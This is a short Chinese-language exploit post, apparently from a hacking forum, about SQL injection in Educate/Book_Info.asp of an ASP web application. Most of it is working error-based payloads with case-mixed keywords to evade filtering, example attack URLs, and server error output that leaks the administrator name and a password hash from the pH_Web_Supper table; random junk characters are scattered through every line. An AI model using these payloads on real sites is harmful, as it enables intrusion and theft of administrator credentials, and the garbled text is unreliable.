漏洞出现在Educate/Book_Info.asp
: e$ F5 B5 |* p& ]) ~! a. w9 | " O% Z8 d4 x0 O" k+ z, o/ ?4 m
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出4 Y% W8 K) [) A! L+ e/ o4 C
6 i! b0 U* p8 F: |exp:如下7 V8 A8 L! h8 l+ ]; K6 G4 W
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
0 H ]( K, }5 e% |' w$ f查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper), O3 i' A* {2 c0 G r. G3 P
3 M: n5 I0 g" Y- c' {4 r2 ohttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)" w9 x' l( e* h. B k" d
6 e% z6 y7 I! r% V E1 L2 B. EMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'* q9 ]4 u* r+ Z
& t, U- i d5 H; @2 H& X/ R将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。# o$ {/ n' r& c& f, u
' f7 r/ V7 G! d7 ~* ^4 t5 K2 l
/Educate/Book_Info.asp,行 83 @* G6 j1 ^ P* i5 Y% ^
, A0 u" z9 q5 \) j
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 I4 L& I$ Y$ y
. B; N1 l; c5 [0 M% T2 J% |: r
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'% t" U, i2 i" o
# s4 @1 _0 @3 M) {
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
+ N) Y8 j& |3 G: | ( N1 _3 s9 x6 }' \* Y
/Educate/Book_Info.asp,行 8- v+ d: K' D7 p; f* q4 s
|